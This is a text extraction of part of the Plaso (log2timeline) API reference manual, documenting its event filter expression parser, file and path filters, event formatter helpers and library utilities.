Event filter expression parser. class plaso.filters.expression_parser.EventFilterExpressionParser Bases: object Event filter expression parser. Examples of valid syntax: size is 40 (name contains “Program Files” AND hash.md5 is “123abc”) @im- ported_modules (num_symbols = 14 AND symbol.name is “FindWindow”) HexEscape(string, match, **unused_kwargs) Converts a hex escaped string. Note that this function is used as a callback by _GetNextToken. Returns next state, which is None. Return type str Raises ParseError – if the string is not hex escaped. Parse(expression) Parses an event filter expression. Parameters expression (str) – event filter expression. Returns expression. Return type Expression class plaso.filters.expression_parser.Token(state, regex, actions, next_state) Bases: object An event filter expression parser token. actions list of method names in the EventFilterExpressionParser to call. Type list[str] next_state next state we transition to if this Token matches. Type str state parser state within the token should be applied or None if the token should be applied regardless of the parser state. Type str CompareExpression(expression) Compares the token against an expression string. Parameters expression (str) – expression string. Returns the regular expression match object if the expression string matches the token or None if no match. Return type re.Match

5.1. Subpackages 155 Plaso (log2timeline), Release 20210606 plaso.filters.expressions module

The event filter expression parser expression classes. class plaso.filters.expressions.BinaryExpression(operator='') Bases: plaso.filters.expressions.Expression An event filter parser expression which takes two other expressions. AddOperands(lhs, rhs) Adds an operand. Parameters • lhs (Expression) – left hand side expression. • rhs (Expression) – right hand side expression. Raises ParseError – if either left hand side or right hand side expression is not an instance of Expression. Compile() Compiles the expression into a filter. Returns filter object corresponding the expression. Return type Filter Raises ParseError – if the operator is not supported. __repr__() Retrieves a string representation of the object for debugging. class plaso.filters.expressions.EventExpression Bases: plaso.filters.expressions.Expression Event expression. Compile() Compiles the expression into a filter. Returns filter object corresponding the expression. Return type Filter Raises ParseError – if the operator is missing or unknown. Negate() Reverses the logic of (negates) the expression. __repr__() Retrieves a string representation of the object for debugging. class plaso.filters.expressions.Expression Bases: object An event filter parser expression. attribute attribute or None if not set. Type str args arguments. Type list[object]

156 Chapter 5. plaso package Plaso (log2timeline), Release 20210606

number_of_args expected number of arguments. Type int operator operator or None if not set. Type str AddArgument(argument) Adds a new argument to this expression. Parameters argument (object) – argument to add. Returns True if the argument is the last argument, False otherwise. Return type bool Raises ParseError – If there are too many arguments. abstract Compile() Compiles the expression into a filter. Returns filter object corresponding the expression. Return type Filter SetAttribute(attribute) Sets the attribute. Parameters attribute (str) – attribute, or None if not set. SetOperator(operator) Set the operator. Parameters operator (str) – operator, such as “and” or “&&”, or None if not set. attribute = None class plaso.filters.expressions.IdentityExpression Bases: plaso.filters.expressions.Expression An event filter parser expression which always evaluates to True. Compile() Compiles the expression into a filter. Returns filter object which always evaluates to True. Return type IdentityFilter plaso.filters.file_entry module

File entry filters. class plaso.filters.file_entry.DateTimeFileEntryFilter Bases: plaso.filters.file_entry.FileEntryFilter Date and time-based file entry filter. AddDateTimeRange(time_value, start_time_string=None, end_time_string=None) Adds a date time filter range.

5.1. Subpackages 157 Plaso (log2timeline), Release 20210606

The time strings are formatted as: YYYY-MM-DD hh:mm:ss.######[+-]##:## Where # are numeric digits ranging from 0 to 9 and the seconds fraction can be either 3 or 6 digits. The time of day, seconds fraction and timezone offset are optional. The default timezone is UTC. Parameters • time_value (str) – time value, such as, atime, ctime, crtime, dtime, bkup and mtime. • start_time_string (str) – start date and time value string. • end_time_string (str) – end date and time value string. Raises ValueError – If the filter is badly formed. Matches(file_entry) Compares the file entry against the filter. Parameters file_entry (dfvfs.FileEntry) – file entry to compare. Returns True if the file entry matches the filter, False if notor None if the filter does not apply. Return type bool Print(output_writer) Prints a human readable version of the filter. Parameters output_writer (CLIOutputWriter) – output writer. class plaso.filters.file_entry.ExtensionsFileEntryFilter(extensions) Bases: plaso.filters.file_entry.FileEntryFilter Extensions-based file entry filter. Matches(file_entry) Compares the file entry against the filter. Parameters file_entry (dfvfs.FileEntry) – file entry to compare. Returns True if the file entry matches the filter, False if notor None if the filter does not apply. Return type bool Print(output_writer) Prints a human readable version of the filter. Parameters output_writer (CLIOutputWriter) – output writer. class plaso.filters.file_entry.FileEntryFilter Bases: object File entry filter interface. abstract Matches(file_entry) Compares the file entry against the filter. Parameters file_entry (dfvfs.FileEntry) – file entry to compare. Returns True if the file entry matches the filter, False if notor None if the filter does not apply. Return type bool

158 Chapter 5. plaso package Plaso (log2timeline), Release 20210606

abstract Print(output_writer) Prints a human readable version of the filter. Parameters output_writer (CLIOutputWriter) – output writer. class plaso.filters.file_entry.FileEntryFilterCollection Bases: object Collection of file entry filters. AddFilter(file_entry_filter) Adds a file entry filter to the collection. Parameters file_entry_filter (FileEntryFilter) – file entry filter. HasFilters() Determines if filters are defined. Returns True if filters are defined. Return type bool Matches(file_entry) Compares the file entry against the filter collection. Parameters file_entry (dfvfs.FileEntry) – file entry to compare. Returns True if the file entry matches one of the filters. If nofilters are provided or applicable the result will be True. Return type bool Print(output_writer) Prints a human readable version of the filter. Parameters output_writer (CLIOutputWriter) – output writer. class plaso.filters.file_entry.NamesFileEntryFilter(names) Bases: plaso.filters.file_entry.FileEntryFilter Names-based file entry filter. Matches(file_entry) Compares the file entry against the filter. Parameters file_entry (dfvfs.FileEntry) – file entry to compare. Returns True if the file entry matches the filter. Return type bool Print(output_writer) Prints a human readable version of the filter. Parameters output_writer (CLIOutputWriter) – output writer. class plaso.filters.file_entry.SignaturesFileEntryFilter(specification_store, signature_identifiers) Bases: plaso.filters.file_entry.FileEntryFilter Signature-based file entry filter. Matches(file_entry) Compares the file entry against the filter. Parameters file_entry (dfvfs.FileEntry) – file entry to compare.

5.1. Subpackages 159 Plaso (log2timeline), Release 20210606

Returns True if the file entry matches the filter, False if notor None if the filter does not apply. Return type bool Print(output_writer) Prints a human readable version of the filter. Parameters output_writer (CLIOutputWriter) – output writer. plaso.filters.filters module

The event filter expression parser filter classes. class plaso.filters.filters.AndFilter(arguments=None) Bases: plaso.filters.filters.Filter A filter that performs a boolean AND on the arguments. Note that if no conditions are passed, all objects will pass. Matches(event, event_data, event_data_stream, event_tag) Determines if the event, data and tag match the filter. Parameters • event (EventObject) – event to compare against the filter. • event_data (EventData) – event data to compare against the filter. • event_data_stream (EventDataStream) – event data stream. • event_tag (EventTag) – event tag to compare against the filter. Returns True if the event, data and tag match the filter, False otherwise. Return type bool class plaso.filters.filters.BinaryOperator(arguments=None, **kwargs) Bases: plaso.filters.filters.Operator Interface for binary operators. left_operand left hand operand. Type object right_operand right hand operand. Type object abstract Matches(event, event_data, event_data_stream, event_tag) Determines if the event, data and tag match the filter. Parameters • event (EventObject) – event to compare against the filter. • event_data (EventData) – event data to compare against the filter. • event_data_stream (EventDataStream) – event data stream. • event_tag (EventTag) – event tag to compare against the filter.

160 Chapter 5. plaso package Plaso (log2timeline), Release 20210606

Returns True if the event, data and tag match the filter, False otherwise. Return type bool class plaso.filters.filters.Contains(arguments=None, **kwargs) Bases: plaso.filters.filters.GenericBinaryOperator Operator to determine if a value contains another value. class plaso.filters.filters.EqualsOperator(arguments=None, **kwargs) Bases: plaso.filters.filters.GenericBinaryOperator Equals (==) operator. class plaso.filters.filters.Filter(arguments=None) Bases: object Filter interface. args arguments provided to the filter. Type list[object] abstract Matches(event, event_data, event_data_stream, event_tag) Determines if the event, data and tag match the filter. Parameters • event (EventObject) – event to compare against the filter. • event_data (EventData) – event data to compare against the filter. • event_data_stream (EventDataStream) – event data stream. • event_tag (EventTag) – event tag to compare against the filter. Returns True if the event, data and tag match the filter, False otherwise. Return type bool class plaso.filters.filters.GenericBinaryOperator(arguments=None, **kwargs) Bases: plaso.filters.filters.BinaryOperator Shared functionality for common binary operators. FlipBool() Negates the internal boolean value attribute. Matches(event, event_data, event_data_stream, event_tag) Determines if the event, data and tag match the filter. Parameters • event (EventObject) – event to compare against the filter. • event_data (EventData) – event data to compare against the filter. • event_data_stream (EventDataStream) – event data stream. • event_tag (EventTag) – event tag to compare against the filter. Returns True if the event, data and tag match the filter, False otherwise. Return type bool

5.1. Subpackages 161 Plaso (log2timeline), Release 20210606

class plaso.filters.filters.GreaterEqualOperator(arguments=None, **kwargs) Bases: plaso.filters.filters.GenericBinaryOperator Greater than or equals (>=) operator. class plaso.filters.filters.GreaterThanOperator(arguments=None, **kwargs) Bases: plaso.filters.filters.GenericBinaryOperator Greater than (>) operator. class plaso.filters.filters.IdentityFilter(arguments=None) Bases: plaso.filters.filters.Operator A filter which always evaluates to True. Matches(event, event_data, event_data_stream, event_tag) Determines if the event, data and tag match the filter. Parameters • event (EventObject) – event to compare against the filter. • event_data (EventData) – event data to compare against the filter. • event_data_stream (EventDataStream) – event data stream. • event_tag (EventTag) – event tag to compare against the filter. Returns True if the event, data and tag match the filter, False otherwise. Return type bool class plaso.filters.filters.InSet(arguments=None, **kwargs) Bases: plaso.filters.filters.GenericBinaryOperator Operator to determine if a value is part of another value. class plaso.filters.filters.LessEqualOperator(arguments=None, **kwargs) Bases: plaso.filters.filters.GenericBinaryOperator Less than or equals (<=) operator. class plaso.filters.filters.LessThanOperator(arguments=None, **kwargs) Bases: plaso.filters.filters.GenericBinaryOperator Less than (<) operator. class plaso.filters.filters.NotEqualsOperator(arguments=None, **kwargs) Bases: plaso.filters.filters.GenericBinaryOperator Not equals (!=) operator. class plaso.filters.filters.Operator(arguments=None) Bases: plaso.filters.filters.Filter Interface for filters that represent operators. abstract Matches(event, event_data, event_data_stream, event_tag) Determines if the event, data and tag match the filter. Parameters • event (EventObject) – event to compare against the filter. • event_data (EventData) – event data to compare against the filter. • event_data_stream (EventDataStream) – event data stream.

162 Chapter 5. plaso package Plaso (log2timeline), Release 20210606

• event_tag (EventTag) – event tag to compare against the filter. Returns True if the event, data and tag match the filter, False otherwise. Return type bool class plaso.filters.filters.OrFilter(arguments=None) Bases: plaso.filters.filters.Filter A filter that performs a boolean OR on the arguments. Note that if no conditions are passed, all objects will pass. Matches(event, event_data, event_data_stream, event_tag) Determines if the event, data and tag match the filter. Parameters • event (EventObject) – event to compare against the filter. • event_data (EventData) – event data to compare against the filter. • event_data_stream (EventDataStream) – event data stream. • event_tag (EventTag) – event tag to compare against the filter. Returns True if the event, data and tag match the filter, False otherwise. Return type bool class plaso.filters.filters.Regexp(arguments=None, **kwargs) Bases: plaso.filters.filters.GenericBinaryOperator Operator to determine if a value matches a regular expression. compiled_re compiled regular expression. Type ??? class plaso.filters.filters.RegexpInsensitive(arguments=None, **kwargs) Bases: plaso.filters.filters.Regexp Operator to determine if a value matches a regular expression. plaso.filters.logger module

The filters sub module logger. plaso.filters.parser_filter module

Helper for parser and plugin filter expressions. class plaso.filters.parser_filter.ParserFilterExpressionHelper Bases: object Helper for parser and plugin filter expressions. A parser filter expression is a comma separated value string that denotes which parsers and plugins shouldbe used. Each element can contain either: • The name of a preset (case sensitive), which is a predefined list of parsers and/or plugins (see data/presets.yaml for the default presets). • The name of a parser (case insensitive), for example ‘msiecf’.

5.1. Subpackages 163 Plaso (log2timeline), Release 20210606

• The name of a plugin, prefixed with the parser name and a ‘/’, for example ‘sqlite/chrome_history’. If the element begins with an exclamation mark (‘!’) the item will be excluded from the set of enabled parsers and plugins, otherwise the element will be included. ExpandPresets(presets_manager, expression) Expands all presets in a parser filter expression. Parameters • presets_manager (ParserPresetsManager) – a parser preset manager, that is used to resolve which parsers and/or plugins are defined by presets. • expression (str) – parser filter expression, where an empty expression represents all parsers and plugins. A parser filter expression is a comma separated value string that denotes which parsers and plugins should be used. Each element can be either: – The name of a preset (case sensitive), which is a predefined list of parsers and/or plugins (see data/presets.yaml for the default presets). – The name of a parser (case insensitive), for example ‘msiecf’. – The name of a plugin, prefixed with the parser name and a ‘/’, for example ‘sqlite/chrome_history’. If the element begins with an exclamation mark (‘!’) the item will be excluded from the set of enabled parsers and plugins, otherwise the element will be included. Returns a parser filter expression where presets have been expanded or None to represent all parsers and plugins. Return type str SplitExpression(expression) Determines the excluded and included elements in an expression string. This method will not expand presets, and preset names are treated like parser names. Parameters expression (str) – parser filter expression. A parser filter expression is a comma separated value string that denotes which parsers and plugins should be used. Each element can be either: • The name of a preset (case sensitive), which is a predefined list of parsers and/or plugins (see data/presets.yaml for the default presets). • The name of a parser (case insensitive), for example ‘msiecf’. • The name of a plugin, prefixed with the parser name and a ‘/’, for example ‘sqlite/chrome_history’. If the element begins with an exclamation mark (‘!’) the item will be excluded from the set of enabled parsers and plugins, otherwise the element will be included. Returns contains: excludes (dict[str, set[str]]): excluded presets, plugins and presets. Dictionary keys are preset and/or parser names, and values are sets containing plugin names to enable for a parser or an asterisk character (‘*’) to represet all plugins, or that no specific plugins were specified.

164 Chapter 5. plaso package Plaso (log2timeline), Release 20210606

includes (dict[str, set[str]]): included presets, parsers and plugins. Dictionary keys are preset and/or parser names, and values are sets containing plugin names to enable for a parser or an asterisk character (‘*’) to represet all plugins, or that no specific plugins were specified. Return type tuple plaso.filters.path_filter module

A scan tree-based path filter implementation. The scan tree is a tree based on multiple paths that contains the path segments per node. The most significant path segment is at the root and therefore compared first. More information can be found here: https://github.com/libyal/ libsigscan/wiki/Internals#scanning-tree-based-signature-scanning The scan tree is used in the filter to filter provided paths. class plaso.filters.path_filter.PathFilterScanTree(paths, case_sensitive=True, path_segment_separator='/') Bases: object Path filter scan tree. CheckPath(path, path_segment_separator=None) Checks if a path matches the scan tree-based path filter. Parameters • path (str) – path. • path_segment_separator (Optional[str]) – path segment separator, where None defaults to the path segment separator that was set when the path filter scan tree was initialized. Returns True if the path matches the filter, False otherwise. Return type bool class plaso.filters.path_filter.PathFilterScanTreeNode(path_segment_index) Bases: object Class that implements a path filter scan tree node. The path filter scan tree node defines the path segments for a specific path segment index to filter.Eachpath segment will point to a scan object that indicates the next part of the path filter. A default value indicates the scan object to use next when there was no match. default_value the default scan object, which is either a scan tree sub node or a path. Type str|PathFilterScanTreeNode parent the parent path filter scan tree node or None if the node has no parent. Type PathFilterScanTreeNode path_segment_index path segment index represented by the node. Type int AddPathSegment(path_segment, scan_object) Adds a path segment.

5.1. Subpackages 165 Plaso (log2timeline), Release 20210606

Parameters • path_segment (str) – path segment. • scan_object (str|PathFilterScanTreeNode) – a scan object, which is either a scan tree sub node or a path. Raises ValueError – if the node already contains a scan object for the path segment. GetScanObject(path_segment) Retrieves the scan object for a specific path segment. Parameters path_segment (str) – path segment. Returns a scan object, which is either a scan tree sub node, a path or the default value. Return type str|PathFilterScanTreeNode SetDefaultValue(scan_object) Sets the default (non-match) value. Parameters scan_object (str|PathFilterScanTreeNode) – a scan object, which is either a scan tree sub node or a path. Raises • TypeError – if the scan object is of an unsupported type. • ValueError – if the default value is already set. ToDebugString(indentation_level=1) Converts the path filter scan tree node into a debug string. Parameters indentation_level (int) – text indentation level. Returns debug string representing the path filter scan tree node. Return type str property path_segments path segments. Type list[str] plaso.filters.value_types module

Value types that can be used in an event filter. class plaso.filters.value_types.DateTimeValueType(*args: Any, **kwargs: Any) Bases: dfdatetime.posix_time. Value type to represent a date and time value.

166 Chapter 5. plaso package Plaso (log2timeline), Release 20210606

Module contents

5.1.7 plaso.formatters package

Submodules

plaso.formatters.chrome module

Google Chrome history custom event formatter helpers. class plaso.formatters.chrome.ChromeHistoryTypedCountFormatterHelper Bases: plaso.formatters.interface.CustomEventFormatterHelper Google Chrome history typed count formatter helper. FormatEventValues(event_values) Formats event values using the helper. Parameters event_values (dict[str, object]) – event values. IDENTIFIER = 'chrome_history_typed_count' plaso.formatters.chrome_preferences module

Google Chrome preferences custom event formatter helpers. class plaso.formatters.chrome_preferences.ChromePreferencesPrimaryURLFormatterHelper Bases: plaso.formatters.interface.CustomEventFormatterHelper Google Chrome preferences primary URL formatter helper. FormatEventValues(event_values) Formats event values using the helper. Parameters event_values (dict[str, object]) – event values. IDENTIFIER = 'chrome_preferences_primary_url' class plaso.formatters.chrome_preferences.ChromePreferencesSecondaryURLFormatterHelper Bases: plaso.formatters.interface.CustomEventFormatterHelper Google Chrome preferences secondary URL formatter helper. FormatEventValues(event_values) Formats event values using the helper. Parameters event_values (dict[str, object]) – event values. IDENTIFIER = 'chrome_preferences_secondary_url'

5.1. Subpackages 167 Plaso (log2timeline), Release 20210606

plaso.formatters.default module

The default event formatter. class plaso.formatters.default.DefaultEventFormatter Bases: plaso.formatters.interface.BasicEventFormatter Formatter for events that do not have any defined formatter. DATA_TYPE = 'event' FORMAT_STRING = ' Attributes: {attribute_driven}' FORMAT_STRING_SHORT = ' {attribute_driven}' FormatEventValues(event_values) Formats event values using the helpers. Parameters event_values (dict[str, object]) – event values. plaso.formatters.file_system module

File system custom event formatter helpers. class plaso.formatters.file_system.NTFSFileReferenceFormatterHelper Bases: plaso.formatters.interface.CustomEventFormatterHelper NTFS file reference formatter helper. FormatEventValues(event_values) Formats event values using the helper. Parameters event_values (dict[str, object]) – event values. IDENTIFIER = 'ntfs_file_reference' class plaso.formatters.file_system.NTFSParentFileReferenceFormatterHelper Bases: plaso.formatters.interface.CustomEventFormatterHelper NTFS parent file reference formatter helper. FormatEventValues(event_values) Formats event values using the helper. Parameters event_values (dict[str, object]) – event values. IDENTIFIER = 'ntfs_parent_file_reference' class plaso.formatters.file_system.NTFSPathHintsFormatterHelper Bases: plaso.formatters.interface.CustomEventFormatterHelper NTFS path hints formatter helper. FormatEventValues(event_values) Formats event values using the helper. Parameters event_values (dict[str, object]) – event values. IDENTIFIER = 'ntfs_path_hints'

168 Chapter 5. plaso package Plaso (log2timeline), Release 20210606

plaso.formatters.firefox module

Mozilla Firefox history custom event formatter helpers. class plaso.formatters.firefox.FirefoxHistoryTypedCountFormatterHelper Bases: plaso.formatters.interface.CustomEventFormatterHelper Mozilla Firefox history typed count formatter helper. FormatEventValues(event_values) Formats event values using the helper. Parameters event_values (dict[str, object]) – event values. IDENTIFIER = 'firefox_history_typed_count' class plaso.formatters.firefox.FirefoxHistoryURLHiddenFormatterHelper Bases: plaso.formatters.interface.CustomEventFormatterHelper Mozilla Firefox history URL hidden formatter helper. FormatEventValues(event_values) Formats event values using the helper. Parameters event_values (dict[str, object]) – event values. IDENTIFIER = 'firefox_history_url_hidden' plaso.formatters.interface module

This file contains the event formatters interface classes. The l2t_csv and other formats are dependent on a message field, referred to as description_long and description_short in l2t_csv. Plaso no longer stores these field explicitly. A formatter, with a format string definition, is used to convert the event object values into a formatted string thatis similar to the description_long and description_short field. class plaso.formatters.interface.BasicEventFormatter(data_type='basic', format_string=None, format_string_short=None) Bases: plaso.formatters.interface.EventFormatter Format event values using a message format string. custom_helpers identifiers of custom event formatter helpers. Type list[str] helpers event formatter helpers. Type list[EventFormatterHelper] GetFormatStringAttributeNames() Retrieves the attribute names in the format string. Returns attribute names. Return type set(str) GetMessage(event_values) Determines the message.

5.1. Subpackages 169 Plaso (log2timeline), Release 20210606

Parameters event_values (dict[str, object]) – event values. Returns message. Return type str GetMessageShort(event_values) Determines the short message. Parameters event_values (dict[str, object]) – event values. Returns short message. Return type str class plaso.formatters.interface.BooleanEventFormatterHelper(input_attribute=None, output_attribute=None, value_if_false=None, value_if_true=None) Bases: plaso.formatters.interface.EventFormatterHelper Helper for formatting boolean event data. input_attribute name of the attribute that contains the boolean input value. Type str output_attribute name of the attribute where the boolean output value should be stored. Type str value_if_false output value if the boolean input value is False. Type str value_if_true output value if the boolean input value is True. Type str FormatEventValues(event_values) Formats event values using the helper. Parameters event_values (dict[str, object]) – event values. class plaso.formatters.interface.ConditionalEventFormatter(data_type='conditional', format_string_pieces=None, format_string_separator=None, format_string_short_pieces=None) Bases: plaso.formatters.interface.EventFormatter Conditionally format event values using format string pieces. GetFormatStringAttributeNames() Retrieves the attribute names in the format string. Returns attribute names. Return type set(str) GetMessage(event_values) Determines the message.

170 Chapter 5. plaso package Plaso (log2timeline), Release 20210606

Parameters event_values (dict[str, object]) – event values. Returns message. Return type str GetMessageShort(event_values) Determines the short message. Parameters event_values (dict[str, object]) – event values. Returns short message. Return type str class plaso.formatters.interface.CustomEventFormatterHelper Bases: plaso.formatters.interface.EventFormatterHelper Base class for a helper for custom formatting of event data. DATA_TYPE = '' abstract FormatEventValues(event_values) Formats event values using the helper. Parameters event_values (dict[str, object]) – event values. IDENTIFIER = '' class plaso.formatters.interface.EnumerationEventFormatterHelper(default=None, input_attribute=None, output_attribute=None, values=None) Bases: plaso.formatters.interface.EventFormatterHelper Helper for formatting enumeration event data. default default value. Type str input_attribute name of the attribute that contains the enumeration input value. Type str output_attribute name of the attribute where the enumeration output value should be stored. Type str values mapping of enumeration input and output values. Type dict[str, str] FormatEventValues(event_values) Formats event values using the helper. If default value is None and there is no corresponding enumeration value then the original value is used. Parameters event_values (dict[str, object]) – event values. class plaso.formatters.interface.EventFormatter(data_type='internal') Bases: object

5.1. Subpackages 171 Plaso (log2timeline), Release 20210606

Base class to format event values. custom_helpers identifiers of custom event formatter helpers. Type list[str] helpers event formatter helpers. Type list[EventFormatterHelper] AddCustomHelper(identifier, input_attribute=None, output_attribute=None) Adds a custom event formatter helper. Parameters • identifier (str) – identifier. • input_attribute (Optional[str]) – name of the attribute that contains the input value. • output_attribute (Optional[str]) – name of the attribute where the output value should be stored. AddHelper(helper) Adds an event formatter helper. Parameters helper (EventFormatterHelper) – event formatter helper to add. FormatEventValues(event_values) Formats event values using the helpers. Parameters event_values (dict[str, object]) – event values. abstract GetFormatStringAttributeNames() Retrieves the attribute names in the format string. Returns attribute names. Return type set(str) abstract GetMessage(event_values) Determines the message. Parameters event_values (dict[str, object]) – event values. Returns message. Return type str abstract GetMessageShort(event_values) Determines the short message. Parameters event_values (dict[str, object]) – event values. Returns short message. Return type str property data_type unique identifier for the event data supported by the formatter. Type str

172 Chapter 5. plaso package Plaso (log2timeline), Release 20210606 class plaso.formatters.interface.EventFormatterHelper Bases: object Base class of helper for formatting event data. abstract FormatEventValues(event_values) Formats event values using the helper. Parameters event_values (dict[str, object]) – event values. class plaso.formatters.interface.FlagsEventFormatterHelper(input_attribute=None, output_attribute=None, values=None) Bases: plaso.formatters.interface.EventFormatterHelper Helper for formatting flags event data. input_attribute name of the attribute that contains the flags input value. Type str output_attribute name of the attribute where the flags output value should be stored. Type str values mapping of flags input and output values. Type dict[str, str] FormatEventValues(event_values) Formats event values using the helper. Parameters event_values (dict[str, object]) – event values. plaso.formatters.logger module

The formatters sub module logger. plaso.formatters.manager module

Manages custom event formatter helpers. class plaso.formatters.manager.FormattersManager Bases: object Custom event formatter helpers manager. classmethod GetEventFormatterHelper(identifier) Retrieves a custom event formatter helper. Parameters identifier (str) – identifier. Returns custom event formatter or None if not available. Return type CustomEventFormatterHelper classmethod RegisterEventFormatterHelper(formatter_helper_class) Registers a custom event formatter helper. The custom event formatter helpers are identified based on their lower case identifier.

5.1. Subpackages 173 Plaso (log2timeline), Release 20210606

Parameters formatter_helper_class (type) – class of the custom event formatter helper. Raises KeyError – if a custom formatter helper is already set for the corresponding identifier. classmethod RegisterEventFormatterHelpers(formatter_helper_classes) Registers custom event formatter helpers. The formatter classes are identified based on their lower case data type. Parameters formatter_helper_classes (list[type]) – classes of the custom event formatter helpers. Raises KeyError – if a custom formatter helper is already set for the corresponding data type. plaso.formatters.msiecf module

MSIE cache file custom event formatter helpers. class plaso.formatters.msiecf.MSIECFCachedPathFormatterHelper Bases: plaso.formatters.interface.CustomEventFormatterHelper MSIE cache file cached path formatter helper. FormatEventValues(event_values) Formats event values using the helper. Parameters event_values (dict[str, object]) – event values. IDENTIFIER = 'msiecf_cached_path' class plaso.formatters.msiecf.MSIECFHTTPHeadersventFormatterHelper Bases: plaso.formatters.interface.CustomEventFormatterHelper MSIE cache file HTTP headers formatter helper. FormatEventValues(event_values) Formats event values using the helper. Parameters event_values (dict[str, object]) – event values. IDENTIFIER = 'msiecf_http_headers' plaso.formatters.shell_items module

Windows shell item custom event formatter helpers. class plaso.formatters.shell_items.ShellItemFileEntryNameFormatterHelper Bases: plaso.formatters.interface.CustomEventFormatterHelper Windows shell item file entry formatter helper. FormatEventValues(event_values) Formats event values using the helper. Parameters event_values (dict[str, object]) – event values. IDENTIFIER = 'shell_item_file_entry_name'

174 Chapter 5. plaso package Plaso (log2timeline), Release 20210606 plaso.formatters.winevt_rc module

Windows Event Log resources database reader. class plaso.formatters.winevt_rc.Sqlite3DatabaseFile Bases: object Class that defines a sqlite3 database file. Close() Closes the database file. Raises RuntimeError – if the database is not opened. GetValues(table_names, column_names, condition) Retrieves values from a table. Parameters • table_names (list[str]) – table names. • column_names (list[str]) – column names. • condition (str) – query condition such as “log_source == ‘Application Error’”. Yields sqlite3.row – row. Raises RuntimeError – if the database is not opened. HasTable(table_name) Determines if a specific table exists. Parameters table_name (str) – table name. Returns True if the table exists. Return type bool Raises RuntimeError – if the database is not opened. Open(filename, read_only=False) Opens the database file. Parameters • filename (str) – filename of the database. • read_only (Optional[bool]) – True if the database should be opened in read-only mode. Since sqlite3 does not support a real read-only mode we fake it by only permit- ting SELECT queries. Returns True if successful. Return type bool Raises RuntimeError – if the database is already opened. class plaso.formatters.winevt_rc.Sqlite3DatabaseReader Bases: object Class to represent a sqlite3 database reader. Close() Closes the database reader object. Open(filename) Opens the database reader object.

5.1. Subpackages 175 Plaso (log2timeline), Release 20210606

Parameters filename (str) – filename of the database. Returns True if successful. Return type bool class plaso.formatters.winevt_rc.WinevtResourcesSqlite3DatabaseReader Bases: plaso.formatters.winevt_rc.Sqlite3DatabaseReader Class to represent a sqlite3 Event Log resources database reader. GetMessage(log_source, lcid, message_identifier) Retrieves a specific message for a specific Event Log source. Parameters • log_source (str) – Event Log source. • lcid (int) – language code identifier (LCID). • message_identifier (int) – message identifier. Returns message string or None if not available. Return type str GetMetadataAttribute(attribute_name) Retrieves the metadata attribute. Parameters attribute_name (str) – name of the metadata attribute. Returns the metadata attribute or None. Return type str Raises RuntimeError – if more than one value is found in the database. Open(filename) Opens the database reader object. Parameters filename (str) – filename of the database. Returns True if successful. Return type bool Raises RuntimeError – if the version or string format of the database is not supported. plaso.formatters.winlnk module

Windows Shortcut (LNK) custom event formatter helpers. class plaso.formatters.winlnk.WindowsShortcutLinkedPathFormatterHelper Bases: plaso.formatters.interface.CustomEventFormatterHelper Windows Shortcut (LNK) linked path formatter helper. FormatEventValues(event_values) Formats event values using the helper. Parameters event_values (dict[str, object]) – event values. IDENTIFIER = 'windows_shortcut_linked_path'

176 Chapter 5. plaso package Plaso (log2timeline), Release 20210606

plaso.formatters.winprefetch module

Windows Prefetch custom event formatter helpers. class plaso.formatters.winprefetch.WindowsPrefetchPathHintsFormatterHelper Bases: plaso.formatters.interface.CustomEventFormatterHelper Windows Prefetch path hints formatter helper. FormatEventValues(event_values) Formats event values using the helper. Parameters event_values (dict[str, object]) – event values. IDENTIFIER = 'windows_prefetch_path_hints' class plaso.formatters.winprefetch.WindowsPrefetchVolumesStringFormatterHelper Bases: plaso.formatters.interface.CustomEventFormatterHelper Windows Prefetch volumes string formatter helper. FormatEventValues(event_values) Formats event values using the helper. Parameters event_values (dict[str, object]) – event values. IDENTIFIER = 'windows_prefetch_volumes_string' plaso.formatters.winreg module

Windows Registry custom event formatter helpers. class plaso.formatters.winreg.WindowsRegistryValuesFormatterHelper Bases: plaso.formatters.interface.CustomEventFormatterHelper Windows Registry values formatter helper. FormatEventValues(event_values) Formats event values using the helper. Parameters event_values (dict[str, object]) – event values. IDENTIFIER = 'windows_registry_values' plaso.formatters.yaml_formatters_file module

YAML-based formatters file. class plaso.formatters.yaml_formatters_file.YAMLFormattersFile Bases: object YAML-based formatters file. A YAML-based formatters file contains one or more event formatters. type: ‘conditional’ data_type: ‘fs:stat’ message: - ‘{display_name}’ - ‘Type: {file_entry_type}’ - ‘({unallocated})’ short_message: - ‘{filename}’ Where: * type, defines the formatter data type, which can be “basic” or “conditional”;

• data_type, defines the corresponding event data type; • message, defines a list of message string pieces;

5.1. Subpackages 177 Plaso (log2timeline), Release 20210606

• separator, defines the message and short message string pieces separator; • short_message, defines the short message string pieces;

ReadFromFile(path) Reads the event formatters from the YAML-based formatters file. Parameters path (str) – path to a formatters file. Returns event formatters. Return type list[EventFormatter]

Module contents

This file contains an import statement for each formatter.

5.1.8 plaso.lib package

Submodules plaso.lib.bufferlib module

Circular buffer for storing event objects. class plaso.lib.bufferlib.CircularBuffer(size) Bases: object Class that defines a circular buffer for storing event objects. Append(item) Add an item to the list. Parameters item (object) – item. Clear() Removes all elements from the list. Flush() Returns a generator for all items and clear the buffer. GetCurrent() Retrieves the current item that index points to. Returns item. Return type object __iter__() Return all elements from the list. __len__() Return the length (the fixed size). property size number of elements in the buffer. Type int

178 Chapter 5. plaso package Plaso (log2timeline), Release 20210606 plaso.lib.decorators module

Function decorators. plaso.lib.decorators.deprecated(function) Decorator to mark functions or methods as deprecated. plaso.lib.definitions module

The definitions. plaso.lib.dtfabric_helper module

The dtFabric helper mix-in. class plaso.lib.dtfabric_helper.DtFabricHelper Bases: object dtFabric format definition helper mix-in. dtFabric defines its data format structures in dtFabric definition file, for example “dtfabric.yaml”: name: int32 type: integer description: 32-bit signed integer type .. attribute:: format signed size 4 units bytes — name: point3d aliases: [POINT] type: structure description: Point in 3 dimensional space. .. attribute:: byte_order little-endian members: - name: x aliases: [XCOORD] data_type: int32

• name: y data_type: int32 • name: z data_type: int32

The path to the definition file is defined in the class constant “_DEFINITION_FILE” and will be readonclass instantiation. The definition files contains data type definitions such as “int32” and “point3d” in the previous example. A data type map can be used to create a Python object that represent the data type definition mapped to a byte stream, for example if we have the following byte stream: 01 00 00 00 02 00 00 00 03 00 00 00 The corresponding “point3d” Python object would be: point3d(x=1, y=2, z=3)

5.1. Subpackages 179 Plaso (log2timeline), Release 20210606 plaso.lib.errors module

